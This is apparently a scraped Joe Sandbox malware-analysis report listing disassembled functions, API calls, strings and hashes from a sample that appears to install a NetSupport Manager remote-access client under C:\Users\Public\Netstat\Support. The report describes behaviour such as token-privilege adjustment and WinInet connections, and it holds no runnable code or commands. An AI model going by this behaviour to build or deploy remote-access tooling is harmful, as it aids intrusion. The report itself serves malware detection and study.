Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: e587fc6ceebff28b6bfa25abec70be2a02cd892ff07c3d472f7c66ba4f6aaacd
Instruction ID: 54c0be9f9f14b97b28f5f5b7978807d44f20558b2d2b838ff0f338eb09cd10ad
Opcode Fuzzy Hash: e587fc6ceebff28b6bfa25abec70be2a02cd892ff07c3d472f7c66ba4f6aaacd
Instruction Fuzzy Hash: 4A419C7180465CAADB26EB64DC49FEE737CAF45340F0040AEBA45EA082DB745F85CF61

Function 003CB275 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

UNC, xrefs: 003CB311
\\?\, xrefs: 003CB2C7, 003CB303, 003CB364, 003CB3B7

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: ba018b5f35ba4863d33abec15e4638a8f3281ccad015f2141543c14e1fbaaecc
Instruction ID: 322bd8f742b3d2e88c3a649c586fbbf919d26b32619f342b75a392217c271e45
Opcode Fuzzy Hash: ba018b5f35ba4863d33abec15e4638a8f3281ccad015f2141543c14e1fbaaecc
Instruction Fuzzy Hash: 12417E35404299ABCB23AF62DC42FEEB76AEF01350F15456AF854D6142E770DD90CBA0

Function 003D802D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 003D803A

Strings

about:blank, xrefs: 003D80D2
Shell.Explorer, xrefs: 003D8066

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: c9651cf37fd4be0b6e46c3c6cf580d719ebc5515150dc957fc61b0adb589d9bf
Instruction ID: 507c532947bf3407bbe2d7fee787db3d7774457a5bca0f2bd5999bf5868b54b0
Opcode Fuzzy Hash: c9651cf37fd4be0b6e46c3c6cf580d719ebc5515150dc957fc61b0adb589d9bf
Instruction Fuzzy Hash: BB218B76210606BFD3069F64E890E36B76CBF84710B15852BF2058B782CF61FC44CBA0

Function 003CDF34 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 003CDEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 003CDED4
Part of subcall function 003CDEB5: GetProcAddress.KERNEL32(00401E58,CryptUnprotectMemory), ref: 003CDEE4

GetCurrentProcessId.KERNEL32(?,?,?,003CDF2E), ref: 003CDFB5

Strings

CryptProtectMemory failed, xrefs: 003CDF75
CryptUnprotectMemory failed, xrefs: 003CDFAD

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 976d722bb1117c7ef01ae678637614cb09757b29a5ec793d27e200b381133c76
Instruction ID: 5564b7196fc28db0f140b5d00bcb7e9dd83b1012108897ac5ab6a61cc7c172cb
Opcode Fuzzy Hash: 976d722bb1117c7ef01ae678637614cb09757b29a5ec793d27e200b381133c76
Instruction Fuzzy Hash: B211EF7130821A6BEB179B39DC41F6E7399BF84B50B06803EF903DA192DB70EC008390

Function 003DBC78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003DBC7D

Part of subcall function 003C7B10: __EH_prolog.LIBCMT ref: 003C7B15
Part of subcall function 003C7B10: new.LIBCMT ref: 003C7B56

Strings

0b@, xrefs: 003DBCC5
C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, xrefs: 003DBCB6

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: H_prolog
String ID: 0b@$C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
API String ID: 3519838083-1127788396
Opcode ID: 67fe996034b28f76cb8c54ffa8e5d0e07d92ad51ee6187e65b10db861899ccc3
Instruction ID: 0a7e78b1046b63a78ef18d8d534c82997aec07919aeb53e0e5b8b8b5b039a86f
Opcode Fuzzy Hash: 67fe996034b28f76cb8c54ffa8e5d0e07d92ad51ee6187e65b10db861899ccc3
Instruction Fuzzy Hash: CE112E31958244EEC306DB98ED45BDC7F60DB15310F0080BFF954AB2D2DBB51944DB29

Function 003C12E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 003CCED7: GetWindowRect.USER32(?,?), ref: 003CCF0E
Part of subcall function 003CCED7: GetClientRect.USER32(?,?), ref: 003CCF1A
Part of subcall function 003CCED7: GetWindowLongW.USER32(?,000000F0), ref: 003CCFBB
Part of subcall function 003CCED7: GetWindowRect.USER32(?,?), ref: 003CCFE8
Part of subcall function 003CCED7: GetWindowTextW.USER32(?,?,00000400), ref: 003CD007

GetDlgItem.USER32(00000000,00003021), ref: 003C132B
SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341

Strings

0, xrefs: 003C12EA

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: Window$Rect$Text$ClientItemLong
String ID: 0
API String ID: 660763476-4108050209
Opcode ID: 3b08870ff3811ec9cd28b2b6be545a04d078b42e351dda3ae7698f5df9ba7b97
Instruction ID: 3d0e420e4e6dd15167629000cf237d97a7f963f5522662505486757d64923a8c
Opcode Fuzzy Hash: 3b08870ff3811ec9cd28b2b6be545a04d078b42e351dda3ae7698f5df9ba7b97
Instruction Fuzzy Hash: D3F081B864028CABDF172F608919FF93B599B06749F094018FE48D4496C774CC52FB14

Function 003CFAC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,003CFD0B,?,?,003CFD80,?,?,?,?,?,003CFD6A), ref: 003CFACD
GetLastError.KERNEL32(?,?,003CFD80,?,?,?,?,?,003CFD6A), ref: 003CFAD9

Part of subcall function 003C6DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C6DF1

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 003CFAE2

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 7f7670d64126836b2b68755480e3292bffa0197f72678c7e8484810fb3e339dc
Instruction ID: 067b56f8637be0e913f59a013c80fecbbdfbc8c1737cd0caf677088b73bdda71
Opcode Fuzzy Hash: 7f7670d64126836b2b68755480e3292bffa0197f72678c7e8484810fb3e339dc
Instruction Fuzzy Hash: 59D0177564852666D60723285D0AFBE79099B12730F250719F23AA91F6CE240C5287A5

Analysis Process: bild.exePID: 7216, Parent PID: 6508COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	104

Executed Functions

Function 1109E190 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501
filethreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,F3EE1E80,00080000,00000000,00000000), ref: 1109D46D
Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9

LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,F3EE1E80,00080000,00000000,00000000), ref: 1109E225
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
GetVersionExA.KERNEL32(?), ref: 1109E260
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
GetLastError.KERNEL32 ref: 1109E33D
LocalFree.KERNEL32(?), ref: 1109E366
LocalFree.KERNEL32(?), ref: 1109E373
GetLastError.KERNEL32 ref: 1109E390
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
LocalFree.KERNEL32(?), ref: 1109E3D9
LocalFree.KERNEL32(?), ref: 1109E3E6

Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8

Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
LocalFree.KERNEL32(?), ref: 1109E4DB
LocalFree.KERNEL32(?), ref: 1109E4E8
_memset.LIBCMT ref: 1109E500
GetTickCount.KERNEL32 ref: 1109E508
GetCurrentProcessId.KERNEL32 ref: 1109E5B4
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
GetLastError.KERNEL32 ref: 1109E624
GetLastError.KERNEL32(00000000), ref: 1109E62B
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
GetLastError.KERNEL32 ref: 1109E669
GetLastError.KERNEL32(00000000), ref: 1109E670
CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
GetLastError.KERNEL32 ref: 1109E6AF
GetLastError.KERNEL32(00000000), ref: 1109E6B6
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
GetLastError.KERNEL32 ref: 1109E6FA
GetLastError.KERNEL32(00000000), ref: 1109E6FD
LocalFree.KERNEL32(?), ref: 1109E725
LocalFree.KERNEL32(?), ref: 1109E732
GetCurrentThreadId.KERNEL32 ref: 1109E763
CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
ResetEvent.KERNEL32(?), ref: 1109E7AC
ResetEvent.KERNEL32(?), ref: 1109E7B2
ResetEvent.KERNEL32(?), ref: 1109E7B8
SetEvent.KERNEL32(?), ref: 1109E7BE

Strings

Error cant map view, xrefs: 1109E3BB
Error filemap exists, xrefs: 1109E4BD
warning map exists, xrefs: 1109E490
cant create events, xrefs: 1109E7F4
map exists, xrefs: 1109E4EA
SeSecurityPrivilege, xrefs: 1109E1FA
Error cant create events, xrefs: 1109E7E7
Info - reusing existing filemap, xrefs: 1109E479
S:(ML;;NW;;;LW), xrefs: 1109E288
Cant create event %s, e=%d (x%x), xrefs: 1109E639, 1109E67E, 1109E6C4, 1109E707
cant create thread, xrefs: 1109E78A
Error creating filemap (%d), xrefs: 1109E344
cant create filemap, xrefs: 1109E375
IPC(%s) created, xrefs: 1109E7C8
cant map, xrefs: 1109E3E8

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
API String ID: 3291243470-2792520954
Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51

Function 11029590 Relevance: 91.5, APIs: 40, Strings: 12, Instructions: 534
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WinInet.dll,F3EE1E80,759223A0,?,00000000), ref: 110295C5
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
InternetCloseHandle.WININET(000000FF), ref: 1102966D
SetLastError.KERNEL32(00000078), ref: 11029673
_malloc.LIBCMT ref: 11029697
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
GetLastError.KERNEL32 ref: 110296D2
_free.LIBCMT ref: 110296DE
_malloc.LIBCMT ref: 110296E7
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
SetLastError.KERNEL32(00000078), ref: 11029764
SetLastError.KERNEL32(00000078), ref: 11029771
SetLastError.KERNEL32(00000078), ref: 1102977B
_free.LIBCMT ref: 11029785

Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
SetLastError.KERNEL32(00000078), ref: 1102981E
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
SetLastError.KERNEL32(00000078), ref: 11029883
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
HttpOpenRequestA.WININET(?,GET,111996A8,00000000,00000000,00000000,8040F000,00000000), ref: 110298CF
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
SetLastError.KERNEL32(00000078), ref: 11029B30
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
SetLastError.KERNEL32(00000078), ref: 11029B99
FreeLibrary.KERNEL32(?), ref: 11029BAA

Strings

InternetCloseHandle, xrefs: 11029659, 110297FF, 11029864, 11029B7C
InternetErrorDlg, xrefs: 110299A0
HttpSendRequestA, xrefs: 110298F7
InternetOpenA, xrefs: 11029735
GET, xrefs: 110298C9
InternetQueryDataAvailable, xrefs: 11029A5D
WinInet.dll, xrefs: 110295BD
InternetQueryOptionA, xrefs: 110296AB, 110296FB
InternetConnectA, xrefs: 1102982B
HttpQueryInfoA, xrefs: 11029943
://, xrefs: 110297A5
HttpOpenRequestA, xrefs: 110298A3

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$CloseConnectHandleHeapHttpLoadRequest
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 2589145992-913974648
Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60

Function 6C5E7030 Relevance: 89.7, APIs: 21, Strings: 30, Instructions: 406
threadlibrarysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C5D2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6C5D2ACB
Part of subcall function 6C5D2A90: _strrchr.LIBCMT ref: 6C5D2ADA
Part of subcall function 6C5D2A90: _strrchr.LIBCMT ref: 6C5D2AEA
Part of subcall function 6C5D2A90: wsprintfA.USER32 ref: 6C5D2B05

Part of subcall function 6C5EDBD0: _malloc.LIBCMT ref: 6C5EDBE9
Part of subcall function 6C5EDBD0: wsprintfA.USER32 ref: 6C5EDC04
Part of subcall function 6C5EDBD0: _memset.LIBCMT ref: 6C5EDC27

LoadLibraryA.KERNEL32(WinInet.dll), ref: 6C5E7057
InitializeCriticalSection.KERNEL32(6C61B898), ref: 6C5E70DF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E70EF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E7115
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E713B
WSAStartup.WSOCK32(00000101,6C61B91A), ref: 6C5E7167
_malloc.LIBCMT ref: 6C5E71A3

Part of subcall function 6C5F1B69: __FF_MSGBANNER.LIBCMT ref: 6C5F1B82
Part of subcall function 6C5F1B69: __NMSG_WRITE.LIBCMT ref: 6C5F1B89
Part of subcall function 6C5F1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C5FD3C1,6C5F6E81,00000001,6C5F6E81,?,6C5FF447,00000018,6C617738,0000000C,6C5FF4D7), ref: 6C5F1BAE

_memset.LIBCMT ref: 6C5E71D3
_calloc.LIBCMT ref: 6C5E7214
_malloc.LIBCMT ref: 6C5E728B
_memset.LIBCMT ref: 6C5E72C1
_malloc.LIBCMT ref: 6C5E72CD
_memset.LIBCMT ref: 6C5E7303
GetTickCount.KERNEL32 ref: 6C5E7361
CreateThread.KERNEL32(00000000,00004000,6C5E6BA0,00000000,00000000,6C61BACC), ref: 6C5E737E
SetThreadPriority.KERNEL32(00000000,00000001), ref: 6C5E73AC
GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\Support\,00000104), ref: 6C5E7430
GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\Public\Netstat\Support\pci.ini), ref: 6C5E74B0
GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C5E74C0
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6C5E7566
timeBeginPeriod.WINMM(00000001), ref: 6C5E7573

Strings

sv.subset.omit, xrefs: 6C5E72E8
_debug, xrefs: 6C5E7502, 6C5E7519, 6C5E753C, 6C5E754C
C:\Users\Public\Netstat\Support\pci.ini, xrefs: 6C5E7481, 6C5E749B
mode, xrefs: 6C5E74A1
General, xrefs: 6C5E733F
sv.ResumeEvent, xrefs: 6C5E7150
sv.hResponseEvent, xrefs: 6C5E712A
sv.hRecvThreadReadyEvent, xrefs: 6C5E7104
TraceFile, xrefs: 6C5E7537
sv.hRecvThread, xrefs: 6C5E7397
506407, xrefs: 6C5E7242
TraceRecv, xrefs: 6C5E74CF, 6C5E74FD
TraceSend, xrefs: 6C5E74DB, 6C5E7514
Trace, xrefs: 6C5E7547
Support\, xrefs: 6C5E7451
sv.s, xrefs: 6C5E71BE
HTCTL32, xrefs: 6C5E7036
htctl.packet_tracing, xrefs: 6C5E74A8
nsmtrace, xrefs: 6C5E74B6
WinInet.dll, xrefs: 6C5E7052
NSM165348, xrefs: 6C5E7257
(iflags & CTL_REMOTE) == 0, xrefs: 6C5E73C2
*CMPI, xrefs: 6C5E731F
C:\Users\Public\Netstat\Support\, xrefs: 6C5E742A, 6C5E7438, 6C5E744C
sv.gateways, xrefs: 6C5E722F
sv.subset.subset, xrefs: 6C5E72A6
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C5E70FF, 6C5E7125, 6C5E714B, 6C5E71B9, 6C5E722A, 6C5E72A1, 6C5E72E3, 6C5E7392, 6C5E73BD
NetworkSpeed, xrefs: 6C5E73D7
*DisconnectTimeout, xrefs: 6C5E733A
pci.ini, xrefs: 6C5E748F

Memory Dump Source

